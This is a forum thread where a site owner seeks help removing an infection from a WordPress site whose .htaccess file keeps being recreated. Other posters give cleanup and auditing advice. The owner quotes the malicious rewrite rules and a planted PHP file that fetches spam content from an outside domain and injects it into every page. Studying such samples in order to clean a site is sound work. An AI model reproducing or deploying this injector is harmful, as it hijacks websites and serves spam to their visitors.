.htaccess keeps re-appearing

[Barret Wallace]

Hi,


I guess, my web site is a little bit hacked... I think, I replaced most of the malicious files, but the .htaccess file has certain (spam-oriented) rewrite rules. When I try to delete it, it doesn't work. The file has 444 permissions and every time I delete the file, it is re-created immediately. Unfortunately, I don't know by whom. Has anybody a clue how to proceed in order to get rid of it?

[White Noise]

Server OS, version, and privilege ?

[Stackprotector]

You don't know by what. Do a check on all recently modified files. If that doesn't give you a good feeling that you really cleaned it re-install

[Barret Wallace]

Hi and thank you very much for your thoughts.


It is a Linux Server (Kernel 2.6.x), which I can use through cPanel, FTP and ssh. The software that is infected is Wordpress. It was hijacked probably already months ago. As far as I can see, the hack "only" adds spam links (hidden by css) to the bottom of my page. Perhaps, I'll have no choice but re-install everything from scratch. However, I also want to understand and learn what happens and I also have to wait a couple of weeks before I can reinstall everything. Thus, I would very much appreciate if there is a chance to clean the mess as good as possible now.


This is what the 444 .htaccess inside the Wordpress root directory looks like:

Code: [Select]

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteRule ^(.*)\.html$ /wp-includes/wp-post.php [QSA,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>


# END WordPressI can't delete this file. The wp-post.php is not a file originally created by Wordpress. The content looks like:

Code: [Select]

<?php
set_time_limit(0);
error_reporting(0);
function getContent($url){
$output='';
if(function_exists('curl_init')) {
$time_out = 30;
$ch = curl_init($url) ;  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; 
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;   
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $time_out) ;   
$output = curl_exec($ch) ;  
curl_close($ch);   
}
elseif(function_exists('file_get_contents')) {
$output = file_get_contents($url);
}else{
$info = parse_url($url);  
$fp = fsockopen($info["host"], 80, $errno, $errstr, 3)or exit($errstr."--->".$errno);
$head = "GET ".$info['path']."?".$info["query"]." HTTP/1.0\r\n";  
$head .= "Host: ".$info['host']."\r\n";  
$head .= "\r\n";  
$write = fputs($fp, $head);  
while (!feof($fp))  
{  
  $output.= fgets($fp);   
} 
}
return $output;
}
$domain =ereg_replace("^www\.", "", $_SERVER['SERVER_NAME']);
echo getContent('http://www.jameslebronbasketballshoes.com/file.aspx?f='.$_SERVER['REQUEST_URI'].'&d='.$domain);
?>I can't delete this file as well.

Any ideas how to find out which script or file or else re-creates the .htaccess file every time I delete it?

[Stackprotector]

Redo the whole setup. It's probably hacked through the theme you are using. You can however check the upload directories, and see if your thimthumb plugin on the theme is not vulnerable.

[proxx]

Any ideas how to find out which script or file or else re-creates the .htaccess file every time I delete it?

I figured that this was explained better than I would have:
http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html

[Barret Wallace]

Thank you!


@Factionwars: I already deleted a file that included an eval(...) expressions and obviously was malicious. Several WP-Plugins indicate that there is most probably no security risk anymore. Although you never now... ;-)


@proxx: audit would be great. However, I can only use ssh as a regular user and can not install or use this tool.


However, I just saw that the .htaccess file is recreated permanently. When I look at the timestamp, it shows always the current server time. Are there any logs that I can have a look at that might point me to the right direction?